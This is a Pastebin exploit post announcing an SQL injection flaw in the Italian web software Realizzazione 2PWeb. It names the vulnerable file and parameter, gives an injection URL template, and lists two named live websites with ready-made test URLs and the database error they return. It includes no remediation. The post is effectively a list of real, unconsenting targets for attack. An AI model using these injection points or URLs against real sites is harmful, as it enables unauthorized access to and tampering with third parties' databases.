Advertisement
KingSkrupellos

Realizzazione 2PWeb SQL Injection

Apr 12th, 2020
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.84 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Realizzazione 2PWeb SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 13/04/2020
  7. # Vendor Homepage : 2pweb.it
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16. # Pastebin : pastebin.com/u/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Realizzazione 2PWeb is prone to an SQL-injection vulnerability because
  23. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  24. Exploiting this issue could allow an attacker to compromise the application, access or
  25. modify data, or exploit latent vulnerabilities in the underlying database.
  26. A remote attacker can send a specially crafted request to the vulnerable application and
  27. execute arbitrary SQL commands in application`s database. Further exploitation of this
  28. vulnerability may result in unauthorized data manipulation.
  29. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30.  
  31. ###################################################################
  32.  
  33. # SQL Vulnerable File :
  34. **********************
  35. /home.php
  36.  
  37. # SQL Vulnerable Parameter :
  38. ***************************
  39. ?primo_livello=[ID-NUMBER]&secondo_livello=[ID-NUMBER]&terzo_livello=[ID-NUMBER]&inc=contenuti&paese=[ID-NUMBER]&id=[SQL Injection]
  40.  
  41. # SQL Injection Exploit :
  42. **********************
  43. /home.php?primo_livello=[ID-NUMBER]&secondo_livello=[ID-NUMBER]&terzo_livello=[ID-NUMBER]&inc=contenuti&paese=[ID-NUMBER]&id=[SQL Injection]
  44.  
  45. ###################################################################
  46.  
  47. # Example Vulnerable Sites :
  48. *************************
  49. Reverse IP results (139.99.192.194)
  50. There are 22 domains hosted on this server.
  51.  
  52. [+] bibliasardeversa.net/home.php?primo_livello=42&secondo_livello=42&terzo_livello=45&inc=contenuti&paese=0&id=1%27
  53.  
  54. [+] iddocca.it/home.php?primo_livello=42&secondo_livello=42&terzo_livello=45&inc=contenuti&paese=0&id=1%27
  55.  
  56. ###################################################################
  57.  
  58. # Example SQL Database Error :
  59. ****************************
  60. You have an error in your SQL syntax; check the manual that corresponds
  61. to your MariaDB server version for the right syntax to use near '' at line 1
  62.  
  63. ###################################################################
  64.  
  65. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  66.  
  67. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement